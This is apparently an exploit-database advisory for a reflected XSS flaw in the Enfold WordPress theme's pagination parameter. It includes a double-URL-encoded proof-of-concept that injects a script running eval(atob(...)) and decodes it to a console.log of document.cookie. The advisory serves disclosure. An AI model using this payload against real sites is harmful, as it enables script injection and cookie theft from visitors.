## https://sploitus.com/exploit?id=WPEX-ID:A53E213F-6011-47F8-93E6-AA5AD30E857E
The issue appears when pagination comes in place while navigating on a WordPress site with Enfold theme active. When that occurs, the parameter “avia-element-paging” appears.
https://[website]/paginated-entry/........&avia-element-paging=2
It is possible for an attacker to add some input text in the URL that is reflected on the response. Therefore, there is a XSS vulnerability that can be exploited crafting a customized URL which includes a link to a paginated entry:
https://[website]/paginated-entry/?ProofOfConcept
"ProofOfConcept" text will be reflected on the server's response. It will be included on generated page buttons.
The attacker can exploit this issue by sending the following payload:
?%2527%253E%253Cscript%253Eeval%2528atob%2528%2522Y29uc29sZS5sb2coZG9jdW1lbnQuY29va2llKQ%253D%253D%2522%2529%2529%253C%252Fscript%253E
which can be decoded as:
'><script>eval(atob("Y29uc29sZS5sb2coZG9jdW1lbnQuY29va2llKQ=="))</script>
and the Base64 payload decoded as:
console.log(document.cookie);